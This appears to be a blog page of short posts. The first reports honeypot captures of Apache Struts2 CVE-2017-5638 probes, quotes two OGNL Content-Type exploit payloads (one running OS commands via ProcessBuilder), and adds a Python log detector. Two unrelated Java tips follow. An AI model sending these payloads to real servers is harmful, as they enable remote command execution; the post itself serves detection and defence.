CVE-2017-5638 scanning still going on

I recently wrote a honey pot that I am currently playing around with. It did not take long before suspicious traffic started popping up. Many of the scans/hacking attempts are against CVE-2017-5638, which relates to a security issue in Apache Struts2 that started getting exploited in March 2017.

The scans/hacking attempts I have seen regarding this in the last 24 hours are listed below. They do nothing more than check whether the security hole exists.

Type 1:

GET / HTTP/1.1
Content-Type: %{(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#wmres=#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’]).(#wmres.getWriter().print(“S2-045 dir–***”)).(#wmreq=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletRequest’)).(#wmres.getWriter().println(#wmreq.getSession().getServletContext().getRealPath(“/”))).(#wmres.getWriter().flush()).(#wmres.getWriter().close())}.multipart/form-data
Accept: */*
Referer: http://**my honeypot IP**:81
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host:**my honeypot IP**:81
Connection: Keep-Alive


Type 2:

GET /index.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: */*
Content-Type: %{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’whoami’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,’echo windows–2017′}:{‘/bin/bash’,’-c’,’echo linux–2017′})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Host:**my honeypot IP**:81
Connection: Keep-Alive
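
One way to flag both probe types in honeypot or web server logs, as an added example (not the honeypot's own code): a legitimate Content-Type never contains an OGNL expression opener, so match on that and tag the request by the markers seen in the two captures above. The function names, tag names and shortened sample requests are constructed for illustration.

```python
import re

# A legitimate Content-Type is a plain media type; the OGNL expression
# opener "%{" (or "${") has no business in it.
EXPR_OPEN = re.compile(r"[%$]\{")
# Substrings from the two captured probe types -> tag (tag names are made up here).
MARKERS = {
    "#_memberAccess": "member-access-override",
    "@ognl.OgnlContext": "member-access-override",
    "getRealPath": "path-disclosure",
    "java.lang.ProcessBuilder": "command-execution",
}

# Constructed, shortened samples: two inert probe fragments and one normal upload.
SAMPLES = [
    "GET / HTTP/1.1\r\nContent-Type: %{(#_memberAccess=@ognl.OgnlContext@"
    "DEFAULT_MEMBER_ACCESS)...getRealPath...}.multipart/form-data\r\n"
    "Host: honeypot.example:81\r\n\r\n",
    "GET /index.action HTTP/1.1\r\nContent-Type: %{(#dm=@ognl.OgnlContext@"
    "DEFAULT_MEMBER_ACCESS)...java.lang.ProcessBuilder...}\r\n\r\n",
    "POST /upload HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=x\r\n\r\n",
]

def parse_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict)."""
    lines = raw.strip().splitlines()
    if not lines:
        return "", {}
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers

def classify(raw):
    """Return a finding for an OGNL-in-Content-Type probe, else None."""
    request_line, headers = parse_request(raw)
    ctype = headers.get("content-type", "")
    if not EXPR_OPEN.search(ctype):
        return None
    tags = sorted({tag for marker, tag in MARKERS.items() if marker in ctype})
    return {"request": request_line, "tags": tags or ["ognl-expression"]}

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample))
```

A request tagged only `ognl-expression` has the expression opener but none of the known markers, which is worth a manual look since it may be a variant not covered by the marker list.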

java.io.File renameTo returns false

Had an issue today where a Java function which moves files stopped working. I realised that Java's io.File.renameTo only throws exceptions for some scenarios. For some errors, it will only return false when something goes wrong.

Only getting true/false on a rather vital operation is rather silly, so my “fix” was to move over to a library from Apache, aka FileUtils.

So now I simply do this: FileUtils.moveFile(oldFile, newFile);

That function actually throws exceptions when something fails 🙂

class Foo is public, should be declared in a file named Foo.java

When working with Java you might encounter this error. The reason is that you have tried to declare a public class in a file with a different name. Each Java file can contain only one public top-level class, and that class must have the same name as the file itself. If you need another class inside your other class, you should look into private inner classes.